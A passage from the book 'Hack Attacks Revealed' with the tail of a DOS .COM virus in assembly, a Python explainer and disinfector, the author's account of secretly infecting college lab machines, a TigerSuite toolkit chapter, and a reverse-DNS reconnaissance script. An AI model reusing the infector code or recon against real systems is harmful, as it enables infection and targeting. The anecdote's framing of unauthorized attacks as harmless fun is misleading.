Hack Attacks Revealed: A Complete Reference with Custom Security Hacking Toolkit, part 9 (pot)
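The listing that follows is the tail of an appending DOS .COM infector (the book's own code; the head of the routine precedes this excerpt). Its mechanics are easy to miss in raw assembly: the virus body is written to the end of the host, the host's first three bytes are saved and replaced by `E9 <disp16>`, and `disp = file_size - 3` is chosen because a `jmp rel16` is relative to the end of its own 3-byte encoding at `0100h`, so the jump lands on the first appended byte. The Python below is an added example, not code from the book or from the virus: it reproduces that arithmetic, builds an inert, constructed infected sample for offline use, applies the same "last two bytes == ID" check the infector uses to avoid reinfection, and performs the inverse (disinfection). The body length and the position of the saved bytes inside the body are assumptions for the sample, since the declarations that would fix them are not all in this excerpt.

```python
"""Infection arithmetic of an appending .COM infector, and its inverse.

Added example; not the book's code or the virus source. The layout of the
constructed virus body (its length, where the three saved host bytes sit)
is an assumption made for the offline sample."""
import struct

VIRUS_ID = b"AZ"          # the two bytes the infector writes last (virus_id)
JMP_OPCODE = 0xE9         # jmp rel16 (jmp_code)
COM_LOAD_OFFSET = 0x100   # a .COM image is loaded and entered at cs:0100h

# Assumed body layout for the constructed sample (not from the listing):
SAMPLE_VIRUS_LENGTH = 40      # stands in for virus_length
SAMPLE_SAVED_BYTES_OFF = 8    # stands in for the offset of _3_bytes in the body


def jmp_displacement(original_size: int) -> int:
    """save_jmp_displacement stores file_size - 3. A jmp rel16 is relative
    to the end of its own 3-byte encoding at 0100h, so the target becomes
    0103h + (size - 3) = 0100h + size: the first byte of the appended body."""
    return original_size - 3


def jmp_target(image: bytes) -> int:
    """Address the leading jmp lands on when the image runs at cs:0100h."""
    disp = struct.unpack_from("<H", image, 1)[0]
    return (COM_LOAD_OFFSET + 3 + disp) & 0xFFFF


def build_infected_sample(host: bytes, virus_length: int = SAMPLE_VIRUS_LENGTH,
                          saved_off: int = SAMPLE_SAVED_BYTES_OFF) -> bytes:
    """Build an offline fixture mirroring write_code / goto_bof / write_jmp:
    an inert NOP body carrying the host's first 3 bytes and ending in 'AZ'
    is appended, then the host's first 3 bytes become E9 <disp16>."""
    if len(host) < 3:
        raise ValueError("a .COM host needs at least 3 bytes to patch")
    if len(host) + virus_length > 0xFF00:
        raise ValueError("result would not fit a .COM segment")
    if not 0 <= saved_off <= virus_length - 5:
        raise ValueError("saved bytes must fit before the trailing ID")
    body = bytearray(b"\x90" * virus_length)        # NOPs: inert stand-in
    body[saved_off:saved_off + 3] = host[:3]        # _3_bytes
    body[-2:] = VIRUS_ID                             # virus_id
    image = bytearray(host) + body
    struct.pack_into("<BH", image, 0, JMP_OPCODE, jmp_displacement(len(host)))
    return bytes(image)


def is_infected(image: bytes, virus_length: int = SAMPLE_VIRUS_LENGTH) -> bool:
    """The infector's own reinfection test (last_chars == ID) plus a
    consistency check: the jmp must land exactly on an appended body of
    the known length."""
    if len(image) < virus_length + 3 or image[0] != JMP_OPCODE:
        return False
    if image[-2:] != VIRUS_ID:
        return False
    original_size = len(image) - virus_length
    return jmp_target(image) == COM_LOAD_OFFSET + original_size


def disinfect(image: bytes, virus_length: int = SAMPLE_VIRUS_LENGTH,
              saved_off: int = SAMPLE_SAVED_BYTES_OFF) -> bytes:
    """Undo the infection: drop the body and put the saved 3 bytes back,
    which is what restore_3_bytes does in memory before jumping to cs:0100h."""
    if not is_infected(image, virus_length):
        raise ValueError("image does not carry this strain")
    original_size = len(image) - virus_length
    body = image[original_size:]
    host = bytearray(image[:original_size])
    host[:3] = body[saved_off:saved_off + 3]
    return bytes(host)


# Constructed 64-byte host: mov ah,4Ch / int 21h (exit) followed by padding.
SAMPLE_HOST = bytes([0xB4, 0x4C, 0xCD, 0x21]) + b"\x00" * 60

if __name__ == "__main__":
    sample = build_infected_sample(SAMPLE_HOST)
    print("jmp target:", hex(jmp_target(sample)), "infected:", is_infected(sample))
    print("clean again:", disinfect(sample) == SAMPLE_HOST)
```

The check in `is_infected` is stronger than the virus's own `last_chars` test: a clean program whose last two bytes happen to be `AZ` would be skipped by the infector, but will not be flagged here unless its leading jump also points exactly at a body of the right length.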


save_jmp_displacement:
        sub     ax, 3                           ; file size - 3 = jmp disp.
        mov     [bp + jmp_disp], ax
write_code:                                     ; append virus body to end of file
        mov     ah, 40h                         ; DOS: write to handle
        mov     cx, virus_length                ;*** equate
        lea     dx, [bp + start]
        int     21h
goto_bof:                                       ; seek to beginning of file
        mov     ax, 4200h                       ; DOS: lseek from start
        xor     cx, cx
        xor     dx, dx
        int     21h
write_jmp:                                      ; to file
        mov     ah, 40h                         ; overwrite first 3 bytes with E9 disp16
        mov     cx, 3
        lea     dx, [bp + jmp_code]
        int     21h
        inc     [bp + infections]
restore_date_time:
        mov     ax, 5701h                       ; DOS: set file date/time (hide the change)
        mov     cx, [bp + dta_file_time]
        mov     dx, [bp + dta_file_date]
        int     21h
close_file:
        mov     ah, 3eh                         ; DOS: close handle
        int     21h
restore_attrib:
        xor     ch, ch
        mov     cl, [bp + dta_file_attrib]      ; restore original attributes
        mov     ax, 4301h                       ; DOS: set file attributes
        lea     dx, [bp + dta_file_name]
        int     21h
done_infecting?:
        mov     ah, [bp + infections]
        cmp     ah, [bp + max_infections]
        jz      bomb
        jmp     find_next
bomb:
;       cmp     bp, 0
;       je      restore_path                    ; original run
;
;       Stuff deleted
restore_path:
        mov     ah, 3bh                         ; DOS: chdir; when path stored
        lea     dx, [bp + root]                 ; '\' not included
        int     21h
        mov     ah, 3bh                         ; cd to original path
        lea     dx, [bp + org_path]
        int     21h
restore_dta:
        mov     ah, 1ah                         ; DOS: set DTA address
        mov     dx, [bp + old_dta_off]
        int     21h
restore_3_bytes:                                ; in memory
        lea     si, [bp + _3_bytes]             ; host's original first 3 bytes
        mov     di, 100h
        cld                                     ; auto-inc si, di
        mov     cx, 3
        rep     movsb
return_control_or_exit?:
        cmp     bp, 0                           ; bp = 0 if original run
        je      exit
        mov     di, 100h                        ; return control back to prog
        jmp     di                              ; -> cs:100h
exit:
        mov     ax, 4c00h                       ; DOS: terminate, exit code 0
        int     21h

; Variable Declarations
old_dta_off     dw 0                            ; offset of old dta address
; dta record
dta_filler      db 21 dup (0)
dta_file_attrib db 0
dta_file_time   dw 0
dta_file_date   dw 0
dta_file_size   dd 0
dta_file_name   db 13 dup (0)
;
search_mask     db '*.COM',0                    ; files to infect: *.COM
search_attrib   dw 00100111b                    ; all files a,s,h,r
com_com         db 'COMMAND.COM'
previous_dir    db ' ',0
root            db '\',0
org_path        db 64 dup (0)                   ; original path
infections      db 0                            ; counter
max_infections  db 1
_3_bytes        db 0, 0, 0
jmp_code        db 0E9h
jmp_disp        dw 0
last_chars      db 0, 0                         ; do last chars = ID ?
virus_id        db 'AZ'
eov:                                            ; end of virus
virus_length    equ offset eov - offset start
                end start

Eventually, I accumulated 2.4 GB worth of hacker secrets, and had amassed the source for more than 2,000 well-known (as well as some lesser known) nasty infectors of every derivative (approximately 2 MB of the 2.4 GB). Looking back, I believe the rush of being part of a “secret society,” coupled with a youthful ego, caused me to forgo my principles for a while, and I began to play hacker while in college.

The computer center was where students did research, typed their papers, and hung out between classes. Typically, there was a waiting list for the workstations. I would habitually take note of the expressions on my fellow students’ faces as they glared at the computer screens—primarily, they looked bored. And that’s what inspired my first attack.

As an elective for a computer science degree, I had chosen an advanced programming class, which met three days a week, two of which were held at the computer center. My plan was simple—and harmless—and motivated by generating some excitement. Because programming was my forte, it didn’t take me long to complete the programs required to finish the class requirements, and I had plenty of time to help others and to plant my custom-made virus.

Upon entering the center, each student had to produce an ID card, and sign in for a particular workstation. Therefore, I couldn’t infect my system or those next to me, so I transferred the hack attack from floppy to stations where students had trouble getting through the exercises. The attacks were simple: Upon x system reboots (all counted in hidden files), the system would execute my virus, typically masquerading as a system file. The effects generally consisted of loud sounds, fake screen “melts,” and graphical displays. And I always left my signature: Mr. Virus. It wasn’t long before the college paper began to publicize the attacks.
And though the students had started looking forward to the next random attack, the administrators were frustrated, and did not have an inkling of how someone could continually circumvent the heavily monitored and supposedly secured center. I continued the attacks for eight weeks, each more imaginative than the last, and they became the topic of countless discussions. The technical staff at the center failed to find the hidden traps and instead had to rebuild each station. Eventually, I was turned in by another student who had overheard me talking to a member of the group I hung out with. Upon my “capture,” the administration informed me that ordinarily my exploits would have resulted in my expulsion; but because the students and staff had so enjoyed the attacks, and because my professors came to my defense, I was allowed to complete my courses. Needless to say, I heeded the warning. I didn’t know then that the really whacked-out introduction to the “other” side of the Underground was yet to come.

… to be continued in: Hack Attacks Denied.

CHAPTER 12
TigerSuite: The Complete Internetworking Security Toolbox

The purpose of this chapter is to introduce a suite of tools that can be used to facilitate a security analysis—to examine and test personal computers and networks for security vulnerabilities, and to secure them against those vulnerabilities. The goal here is to take the mystery out of security and bring it directly to the consumer and/or technology professional, where it belongs. TigerSuite was developed to provide network security tools that are unique to the computer industry and sorely needed by individuals, commercial organizations, network professionals, and corporate managers concerned with maintaining a secure network.
Such security includes protection against personal attacks, external attacks, and internal attempts at viewing or leveraging confidential company or private information against the “victim.” At the time of this writing, a complete suite of security products does not exist on the market; TigerSuite is the first to provide a complete suite of products in one package.

Tiger Terminology

But before launching into a discussion of the inner workings of TigerSuite, some definitions are in order, some “tiger terminology,” if you will. We begin by identifying the role of a tiger team. Originally, a tiger team was a group of paid professionals whose purpose was to penetrate perimeter security and to test or analyze the inner security policies of corporations. These people hacked into the computer systems, phone systems, safes, and so on to show the companies that hired them how to revamp their security policies. More recently, a tiger team has come to refer to any official inspection or special operations team that is called in to evaluate a security problem. A subset of tiger teams comprises professional hackers and crackers who test the security of computer installations by attempting remote attacks via networks or supposedly secure communication channels. Tiger teams are also called in to test programming code integrity. Many software development companies outsource such teams to perform stringent dynamic code testing before putting software on the market.

As the world becomes increasingly networked, corporate competitors and spies, disgruntled employees, and bored teenagers more frequently invade company and organization computers to steal information, sabotage careers, or just make trouble. Together, the Internet and the World Wide Web have opened wide a backdoor through which competitors and/or hackers can launch attacks on targeted computer networks.
From my own experience, it seems approximately 85 percent of the networks wired to the Internet are vulnerable to such threats. With the growth of the Internet and continued advances in technology, these intrusions are becoming increasingly prevalent. In short, external threats are a real-world problem for any company with remote connectivity.

For those reasons, hackers and tiger teams rely on what’s called a TigerBox to provide the necessary tools to reveal security weaknesses; such a box contains tools designed for sniffing, spoofing, cracking, scanning, and penetrating security vulnerabilities. It can be said that the TigerBox is the ultimate mechanism in search of the hack attack. The most important element of a TigerBox is the operating system foundation. A first-rate TigerBox is configured in a dual-boot setting that includes UNIX and Microsoft Windows operating systems. Currently, TigerBox utility compilations for Microsoft’s OS are not as popular as those for its UNIX counterpart, but Windows is becoming more competitive in this regard.

As you know by now, UNIX is a powerful operating system originally developed at AT&T Bell Laboratories for the scientific, engineering, and academic communities. By its nature, UNIX is a multiuser, multitasking environment that is both flexible and portable, and that offers electronic mail, networking, programming, text-processing, and scientific capabilities. Over the years, two major forms of UNIX (with numerous vendor variants of each) have evolved: AT&T UNIX System V and the University of California at Berkeley’s Berkeley Software Distribution (BSD). But it is Linux, the trendy UNIX variant, that is commonly configured on a TigerBox. Linux offers direct control of the O/S command line, including custom code compilation for software stability and flexibility. In fact, most of the exploits in this book can be compiled under Linux.
Currently, Linux is customized, packaged, and distributed by many vendors, including: RedHat Linux (www.redhat.com), Slackware (www.slackware.org), Debian (www.debian.org), TurboLinux (www.turbolinux.com), Mandrake (www.linux-mandrake.com), SuSE (www.suse.com), Trinux (www.trinux.org), MkLinux (www.mklinux.org), LinuxPPC (www.linuxppc.org), SGI Linux (http://oss.sgi.com/projects/sgilinux11), Caldera OpenLinux (www.caldera.com), Corel Linux (http://linux.corel.com), and Stampede Linux (www.stampede.org).

A dual-boot configuration makes it easy to boot multiple operating systems on a single TigerBox. (Note: the Windows complement should be installed and configured prior to Linux.) At the time of this writing, the Windows versions that are most stable and competent include Windows 98 Second Edition and the Millennium Edition (the Windows 2000 Edition was being tested as this book was going to press). The Linux flavor regarded as most flexible and supportive is RedHat Linux (www.redhat.com). And note that if multiboot, third-party products “rub the wrong way,” the RedHat installation program now offers the option of making a boot diskette (containing a copy of the installed kernel and all modules required to boot the system). The boot diskette can also be used to load a rescue diskette. Then, when it is time to execute Windows, simply reboot the system minus the boot diskette; or when using Linux, simply reboot with the boot disk, and presto, you will see:

    Red Hat Linux release 6.x
    Kernel on an i586
    login:

The inexperienced should use a program such as BootMagic (www.powerquest.com/products/index.html) by PowerQuest Corporation for hassle-free, multiple boot setup with a graphical interface.

LEGAL RAMIFICATIONS OF USING A TIGERBOX

To the best of my knowledge, the first United States statute that specifically prohibits hacking is the Federal Fraud and Computer Abuse Act of 1986, enacted to fill legislative gaps in previous statutes.
Subsection (a) of this act makes it a felony to knowingly access a computer without authorization and to obtain information with the intent to injure the United States or to benefit a foreign nation. This subsection protects any information that has been determined, pursuant to an executive order or statute, to be vital to this nation’s national defense or foreign relations. In addition, the 1986 act prohibits unauthorized access of information contained in a financial record or consumer-reporting agency, provided a “federal interest computer” is involved.

The first successful prosecution under the 1986 act was United States of America v. Robert Tappan Morris (#774, Docket 90-1336, United States Court of Appeals, Second Circuit; argued Dec. 4, 1990, decided March 7, 1991), which involved a typical hacking offense and its resultant damage. The defendant was charged and convicted under subsection (a), which makes it a felony to intentionally access any "federal interest" computer without authorization and alter, damage, destroy, or prevent the authorized use of information, resulting in the loss of at least $1,000.

In the fall of 1988, Morris was a first-year graduate student in Cornell University’s computer science Ph.D. program. Through undergraduate work at Harvard and in various jobs he had acquired significant computer experience and expertise. When Morris entered Cornell, he was given an account on the computer at the Computer Science Division. This account gave him explicit authorization to use computers at Cornell. Morris engaged in various discussions with fellow graduate students about the security of computer networks and his ability to penetrate them. In October 1988, Morris began work on a computer program, later known as the Internet "worm" or "virus." The goal of this program was to demonstrate the inadequacies of current security measures on computer networks by exploiting the security defects that Morris had discovered.
The tactic he selected was the release of a worm into network computers. Morris designed the program to spread across a national network of computers after being inserted at one computer location connected to the network. Morris released the worm into the Internet, a group of national networks that connected university, governmental, and military computers around the country. The network permitted communication and transfer of information between computers on the network.

Morris sought to program the Internet worm to spread widely without drawing attention to itself. The worm was supposed to occupy little computer operation time, and thus not interfere with normal use of the computers. Morris programmed the worm to make it difficult to detect and read, so that other programmers would not be able to "kill" the worm easily. Morris also wanted to ensure that the worm did not copy itself onto a computer that already had a copy. Multiple copies of the worm on a computer would make it easier to detect and would bog down the system and ultimately cause the computer to crash. Therefore, Morris designed the worm to "ask" each computer whether it already had a copy of the worm. If the computer responded "no," then the worm would copy itself onto the computer; if it responded "yes," the worm would not duplicate. However, Morris was concerned that other programmers could kill the worm by programming their own computers to falsely respond "yes" to the question. To circumvent this protection, Morris programmed the worm to duplicate itself every seventh time it received a "yes" response. As it turned out, Morris underestimated the number of times a computer would be asked the question, and his one-out-of-seven ratio resulted in far more copying than he had anticipated. The worm was also designed so that it would be killed when a computer was shut down, an event that typically occurs once every week or two.
This should have prevented the worm from accumulating on one computer, had Morris correctly estimated the likely rate of reinfection.

Morris identified four ways in which the worm could break into computers on the network: (1) through a "hole" or "bug" (an error) in SEND MAIL, a computer program that transferred and received electronic mail on a computer; (2) through a bug in the "finger demon" program, a program that permitted a person to obtain limited information about the users of another computer; (3) through the "trusted hosts" feature, which permitted a user with certain privileges on one computer to have equivalent privileges on another computer without using a password; and (4) through a program of password guessing, whereby various combinations of letters are tried out in rapid sequence in the hope that one will be an authorized user’s password, which is entered to permit whatever level of activity that user is authorized to perform.

On November 2, 1988, Morris released the worm from a computer at the Massachusetts Institute of Technology. MIT was selected to disguise the fact that the worm came from Morris at Cornell. Morris soon discovered that the worm was replicating and reinfecting machines at a much faster rate than he had anticipated. Ultimately, machines at locations around the country either crashed or became "catatonic." When Morris realized what was happening, he contacted a friend at Harvard to discuss a solution. Eventually, they sent an anonymous message from Harvard over the network, instructing programmers how to kill the worm and prevent reinfection. However, because the network route was clogged, the message did not get through until it was too late. Computers were affected at numerous installations, including leading universities, military sites, and medical research facilities. The estimated cost of dealing with the worm at each installation ranged from $200 to more than $53,000.
Morris was found guilty, following a jury trial, of violating 18 U.S.C. Section 1030(a)(5)(A). He was sentenced to three years of probation, 400 hours of community service, a fine of $10,050, and the costs of his supervision. The success of this prosecution demonstrated that the United States judicial system can and will prosecute domestic computer crimes that are deemed to involve national interests. That said, the federal government to date has been reluctant to prosecute under the 1986 act, possibly because most state legislatures have adopted their own regulations, and Congress is hesitant to usurp state court jurisdiction over computer-related crimes. Therefore it is a good idea to become familiar with local legislative directives as they pertain to discovery, hacking, and security analysis.

Hardware requirements depend on the intended usage of the TigerBox. For example: Will the system be used for programming? Will the system serve as a gaming PC? Currently, the minimum requirements, to accommodate most scenarios, include the following:

• Processor: Pentium 160+.
• RAM: 64 MB.
• HDD: 8 GB.
• Video: Support for at least 1024 × 768 resolution at 16K colors.
• Network: Dual NICs, at least one of which supports passive or promiscuous mode. (When an interface is in promiscuous mode, you are explicitly asking to receive a copy of all packets, whether addressed to the TigerBox or not. On a switched segment this still yields only the traffic the switch forwards to your port, so a hub or a mirror port is needed to observe other hosts’ conversations.)
• Other: Three-button mouse, CD-ROM, and floppy disk drive.

Introduction to TigerSuite

Designed using proprietary coding and technologies, TigerSuite is a compilation of everything you need to conduct a professional security analysis; that is, hacking to discover, scan, penetrate, expose, control, spy, flood, spoof, sniff, infect, report, monitor, and more.
In a 9/2000 benchmark comparison conducted by ValCom Engineers (www.pccval.com) between TigerSuite and other popular commercial discovery/scan software, for a simple 1,000-port scan, Tiger Tools completed an average scan in less than one minute, compared to an average of 35 minutes for the others, with the same results found in both scans. Their overall verdict: the design and the developed product are awesome.

Installation

TigerSuite can be activated using one of two methods: local or mobile. The local method requires a simple installation from the CD-ROM. The mobile method involves a new technological feature that allows TigerSuite to be run directly from the CD. Utilizing portable library modularization techniques, the software is executed from the CD by running the main program file, TSmobile.EXE. This convenient feature permits normal use of the software without modifying the PC’s configuration and/or occupying essential hard disk space.

Local Installation Method

The TigerSuite local installation process takes only a few minutes. The Setup program (included on this book’s CD) automatically installs, configures, and initializes an evaluation copy of the tool suite.

Figure 12.1 TigerSuite welcome screen.

The minimum system requirements for the local installation process are as follows:

• Operating System: Windows NT Workstation 4.0, Windows NT Server 4.0, Windows NT Server 5.0, Windows 95, Windows 98, Millennium Edition, or Windows 2000
• Operating System Service Pack: Any
• Processor: Pentium or better
• Memory: 16 MB or more
• Hard Drive Space: 10 MB free
• Network/Internet Connection: 10BASE-T, 100BASE-T, Token Ring, ATM, xDSL, ISDN, cable modem, or regular modem connection using the TCP/IP protocol

The installation process can be described in six steps:

1. Run TSsetup.EXE. When running the Setup program, the application must first unpack the setup files and verify them.
Once running, if Setup detects an existing version of TigerSuite, it will automatically overwrite older files with the newer upgrade. A welcome screen is displayed (see Figure 12.1).

Figure 12.2 TigerSuite User Information screen.

2. Click Next to continue.
3. Review the Licensing Agreement. You must accept and agree to the terms and conditions of the licensing agreement, by clicking Yes, to complete the Setup process. Otherwise, click No to exit the Setup. The following is an extract from this policy:

This software is sold for information purposes only, providing you with the internetworking knowledge and tools to perform professional security audits. Neither the developers nor distributors will be held accountable for the use or misuse of the information contained. This software and the accompanying files are sold "as is" and without warranties as to performance or merchantability or any other warranties whether expressed or implied. While we use reasonable efforts to include accurate and up-to-date information, we make no representations as to the accuracy, timeliness, or completeness of that information, and you should not rely upon it. In using this software, you agree that its information and services are provided "as is, as available" without warranty, express or implied, and that you use this at your own risk. By accessing any portion of this software, you agree not to redistribute any of the information found therein. We shall not be liable for any damages or costs arising out of or in any way connected with your use of this software. You further agree that any developer or distributor of this software and any other [...]
... modules are well designed to provide detailed penetration attacks that test strengths and weaknesses by locating security gaps. These hacking procedures offer an in-depth assessment of potential security risks that may exist internally and externally. The TigerBox Toolkit penetrators can be launched by clicking on the mini TS icon in the taskbar, then TigerBox Toolkit, and finally, Penetrators, as shown ...

... vulnerability attacks discussed in Chapter 9? These exploits can be practical assessments for potential Web page hacking. Let’s continue with target IP address and port scans. Assuming a Class C network block, we’ll use the TigerSuite TigerBox Toolkit/Scanners/IP Range Scan to verify our active addresses and possibly ...

Figure 12.35 Resolving the target hostname.
Figure 12.36 Performing a Site Query Scan.

... equipment that encounters these packets, such as routers, strip off and examine the headers that contain the sensitive routing information. These headers are then modified and reformulated as a packet to be passed along. IP datagrams are the primary information units in the Internet. The IP’s responsibilities also include the fragmentation and reassembly of datagrams to support links with different transmission ...

... message packets, reporting errors, and other pertinent information back to the sending station, or source. Hosts and infrastructure equipment use ICMP to communicate control and error information as they pertain to IP packet processing. ICMP message encapsulation is a twofold process: Messages are encapsulated in IP datagrams, which are encapsulated in frames, as they travel across the Internet. Basically, ICMP uses the same unreliable means of communications as a datagram ...

... Underground gateway AstaLaVista (www.astalavista.com), shown in Figure 12.34. AstaLaVista is renowned as one of the official Underground site-listing spiders. But using these search engines, we do not come across any relevant information pertaining to our target research.

Figure 12.34 Searching the Underground.

Step 2: Discovery

The next step in our sample analysis is the discovery phase. Based on the valuable ...

... ascertain the position of a firewall or filtering device.

WhoIs Query (Figure 12.22). This module is a target discovery Whois that acts as a tool for looking up records in the NSI Registrar database. Each record within the NSI Registrar database has a unique identifier assigned to it: a name, a record type, and various other fields. To use Whois for a domain search, simply type in the domain you are looking ...

... trails, and much more. The Script field, on the other hand, allows for instant replies, hack script uploads, and more to the hacking station or TigerBox (see Figure 12.30).

Sample Real-World Hacking Analysis

Chapters 5-9 described the techniques relevant to the first few phases of a security audit, through the discovery process of a target company, XYZ, Inc. In this section we will re-create our findings with ...

... Space and Volume Information modules.

Figure 12.11 Memory Stats, Power Stats and Processor Information modules.

• Memory Status, Power Status, and Processor Info (Figure 12.11). These modules provide crucial memory, power, and processor status before, during, and after a security analysis and/or penetration-testing sequence. From the data gathered, an average baseline can be predicted in regard to how many ...

... displays that information in a table. The Internetworking modules are defined as follows:

• IP Stats (Figure 12.13). This module gathers current statistics on interface IP routes, datagrams, fragments, reassembly, and header errors. Remember, IP is a protocol designed to interconnect networks to form an Internet to pass data back and forth. It contains addressing and control information that enable packets ...

... 12.37). With these findings, a hacker would consider our target administrator to be a “lamer,” basically an ignorant or inexperienced IS technician—whose job may be in jeopardy if these potentially vulnerable nodes contain security breaches. More important, we’ll carefully note the following:

Host Address (IP)    DNS Resolution
206.0.139.8          mtopel.xyzinc.net
206.0.139.89         kflippel.xyzinc.net

Chances are that these ...
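The discovery fragments above end on the step that matters most to an attacker: a Class C range scan followed by reverse resolution, where the PTR names (mtopel, kflippel) appear to identify the person sitting at each machine rather than the machine's role. The following is an added example, not TigerSuite or the book's code: it sweeps a /24, reverse-resolves each address through an injectable resolver, and flags names that look like a person's. The PTR table is constructed for offline use (the two xyzinc.net workstation entries echo the page's table; the other records are made up), and the "looks like a person" test is a heuristic, not a rule from the page.

```python
"""Sweep a Class C block, reverse-resolve it, flag person-like PTR names.

Added example, not TigerSuite or the book's code. PTR data is constructed
for offline use; the person-name test is a heuristic."""
import ipaddress
import re
import socket
from typing import Callable, Dict, List, Optional, Tuple

# First labels that normally denote infrastructure rather than someone's desk.
INFRA_LABELS = {"www", "mail", "smtp", "pop", "imap", "ns", "ns1", "ns2", "dns",
                "gw", "gateway", "router", "fw", "firewall", "ftp", "proxy", "vpn"}

# Constructed PTR records (assumption for the offline run, not live data).
SAMPLE_PTR: Dict[str, str] = {
    "206.0.139.1": "gw.xyzinc.net",
    "206.0.139.5": "ns1.xyzinc.net",
    "206.0.139.8": "mtopel.xyzinc.net",
    "206.0.139.89": "kflippel.xyzinc.net",
    "206.0.139.200": "ws200.xyzinc.net",
}

Resolver = Callable[[str], Optional[str]]


def offline_resolver(ip: str) -> Optional[str]:
    """Look the address up in the constructed PTR table."""
    return SAMPLE_PTR.get(ip)


def live_resolver(ip: str) -> Optional[str]:
    """Real reverse lookup; None where no PTR record exists or DNS fails."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except (socket.herror, socket.gaierror, OSError):
        return None


def looks_like_person(hostname: str) -> bool:
    """Heuristic: a purely alphabetic first label of 4+ characters that is
    not a common infrastructure word. mtopel / kflippel (initial + surname)
    match; mail, ns1 and ws200 do not."""
    label = hostname.split(".")[0].lower()
    if label in INFRA_LABELS:
        return False
    return re.fullmatch(r"[a-z]{4,}", label) is not None


def sweep(block: str, resolver: Resolver = live_resolver) -> List[Tuple[str, str, bool]]:
    """Reverse-resolve every usable address in the block (network and
    broadcast addresses excluded) and tag each hit with the heuristic."""
    net = ipaddress.ip_network(block, strict=False)
    hits: List[Tuple[str, str, bool]] = []
    for host in net.hosts():
        name = resolver(str(host))
        if name:
            hits.append((str(host), name, looks_like_person(name)))
    return hits


def leaked_identities(block: str, resolver: Resolver = live_resolver) -> List[Tuple[str, str]]:
    """Addresses whose PTR name appears to identify the person at the machine."""
    return [(ip, name) for ip, name, personal in sweep(block, resolver) if personal]


if __name__ == "__main__":
    for ip, name, personal in sweep("206.0.139.0/24", offline_resolver):
        print(f"{ip:<16} {name:<24} {'PERSON?' if personal else ''}")
```

Run it with `live_resolver` against a block you are authorized to assess; the offline table is only there so the example runs without network access. The defensive reading is the same one the page hints at: PTR records that name people hand an attacker both a target list for social engineering and a map of which nodes are user workstations. Naming workstations by asset tag removes that leak without changing anything else about the network.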

Posted: 10/08/2014, 12:21

Table of contents

  • Chapter 12 - TigerSuite: The Complete Internetworking Security Toolbox

  • Appendix A - IP Reference Table and Subnetting Charts

  • Appendix B - Well-Known Ports and Services

  • Appendix C - All-Inclusive Ports and Services

  • Appendix D - Detrimental Ports and Services
